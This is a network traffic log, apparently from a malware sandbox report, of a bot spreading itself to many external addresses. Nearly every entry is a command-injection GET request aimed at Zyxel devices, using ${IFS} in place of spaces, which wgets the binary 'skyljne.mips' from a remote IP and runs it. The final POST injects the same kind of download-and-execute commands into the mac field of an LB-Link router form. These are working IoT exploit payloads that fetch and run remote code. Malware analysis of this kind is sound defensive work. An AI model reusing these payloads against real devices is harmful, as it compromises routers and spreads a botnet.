                                                Jan 12, 2024 18:24:32.771258116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3717192.168.2.134012620.157.143.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771311998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3718192.168.2.134704437.209.160.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771341085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3719192.168.2.1333520119.35.96.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771394014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3720192.168.2.135247846.189.97.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771429062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3721192.168.2.134307441.212.145.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771469116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3722192.168.2.1355928170.14.101.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771516085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3723192.168.2.133986017.75.129.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771553040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3724192.168.2.1360172115.202.70.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771606922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3725192.168.2.1359054218.55.191.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771634102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3726192.168.2.1336408173.207.136.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771703005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3727192.168.2.1349722128.142.134.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771752119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3728192.168.2.1346774207.106.0.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771778107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3729192.168.2.1347104191.148.166.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771810055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3730192.168.2.1341728206.79.162.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771863937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3731192.168.2.135421661.90.162.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771897078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3732192.168.2.1341720156.108.71.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771948099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3733192.168.2.1335896186.5.197.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772010088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3734192.168.2.1339590120.238.199.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772027016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3735192.168.2.135009241.19.235.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772099018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3736192.168.2.134196042.207.255.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772139072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3737192.168.2.135772279.34.146.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772166014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3738192.168.2.1333042178.172.59.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772197962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3739192.168.2.135583848.196.131.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772217989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3740192.168.2.1345940121.70.85.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772259951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3741192.168.2.134830048.245.89.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772305012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3742192.168.2.1359666210.94.40.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772349119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3743192.168.2.1352950168.151.43.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772401094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3744192.168.2.133775279.92.107.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772434950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3745192.168.2.1342942140.106.36.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772481918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3746192.168.2.133374863.248.162.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772536039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3747192.168.2.1353826143.60.215.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772562981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3748192.168.2.1338182193.51.98.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772609949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3749192.168.2.1346726110.57.116.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772656918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3750192.168.2.1335726122.77.205.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772686005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3751192.168.2.1332832195.134.210.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772737026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3752192.168.2.1354628153.54.141.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772785902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3753192.168.2.135443249.221.80.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772805929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3754192.168.2.1340094118.123.32.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772864103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3755192.168.2.1355298139.38.6.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772880077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3756192.168.2.134013879.91.229.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772927046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3757192.168.2.1336960108.164.73.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.772967100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3758192.168.2.1357944204.64.192.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773010969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3759192.168.2.1346194144.134.88.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773045063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3760192.168.2.1355960198.2.203.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773094893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3761192.168.2.1337500103.155.171.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773142099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3762192.168.2.134457424.116.136.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773169041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3763192.168.2.135569225.153.75.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773211956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3764192.168.2.133336291.16.63.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773241997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3765192.168.2.1349478126.24.207.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773276091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3766192.168.2.1356464194.216.188.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773324966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3767192.168.2.1359500137.24.4.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773375988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3768192.168.2.1335990126.171.43.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773426056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3769192.168.2.135613670.25.75.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773461103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3770192.168.2.1358944219.154.172.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773500919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3771192.168.2.1346270152.132.156.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773539066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3772192.168.2.134354873.71.20.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773575068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3773192.168.2.1345886172.98.246.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773602009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3774192.168.2.134486288.89.186.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773641109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3775192.168.2.1339450178.73.96.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.773670912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3776192.168.2.1342300163.171.216.558080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.407254934 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:33.623361111 CET1286INHTTP/1.1 400 Bad Request
                                                Server: nginx
                                                Date: Fri, 12 Jan 2024 17:24:33 GMT
                                                Content-Type: text/html
                                                Content-Length: 2449
                                                Connection: close
                                                x-ws-request-id: 65a175d1_VM-IST-014xZ98_18017-25040
